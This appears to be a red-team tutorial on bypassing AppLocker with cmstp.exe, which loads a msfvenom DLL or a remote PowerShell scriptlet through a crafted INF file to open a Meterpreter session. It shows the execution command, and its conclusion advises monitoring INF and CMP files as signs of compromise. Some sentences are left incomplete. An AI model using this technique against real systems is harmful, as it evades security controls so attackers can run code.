AppLocker Bypass – CMSTP

CMSTP is a binary which is associated with the Microsoft Connection Manager Profile Installer. It accepts INF files which can be weaponised with malicious commands in order to execute arbitrary code in the form of scriptlets (SCT) and DLL. It is a trusted Microsoft binary which is located in the following two Windows directories.

C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe

AppLocker default rules permit execution of binaries in these folders therefore it can be used as a bypass method. Initially Oddvar Moe discovered that it is possible to use this binary to bypass AppLocker and UAC and published his research on his blog.

DLL

Metasploit Framework can be used to generate malicious DLL files via msfvenom.

Metasploit multi/handler module needs to be configured to receive the connection.

CMSTP – Metasploit Multi Handler

When the malicious INF file is supplied along with cmstp the code will executed on the background.

cmstp.exe /s cmstp.inf

CMSTP – INF Execution Locally

A Meterpreter session will open from the DLL execution.

CMSTP – Meterpreter via DLL Execution

SCT

Except of DLL files cmstp is also able to run SCT files which extends the usability of this binary during red team operations. Nick Tyrer has initially presented this capability over Twitter.

Nick Tyrer has written also a scriptlet called powersct.sct which can be used as alternative solution to execute PowerShell commands in case native PowerShell is blocked. The UnRegisterOCXSection needs to contain the URL of the scriptlet. The final INF file needs to contain the following:

Upon execution of the INF file a new command prompt window will open which it will be an indication that the code has been executed successfully.

CMSTP – INF Execution with Scriptlet

A Meterpreter session will open.

CMSTP – Meterpreter via SCT Execution

Conclusion

Usage of CMSTP binary for bypassing AppLocker restrictions and execution of code is . CMSTP needs INF files and upon execution generates and a CMP file which is the connection manager settings file. Both of these files are actually text files and it is unlikely to trigger any alerts. Therefore these two files needs to be monitored as an indicator of compromise if cmstp.exe binary cannot be blocked by an AppLocker rule since threat actors have started using this technique.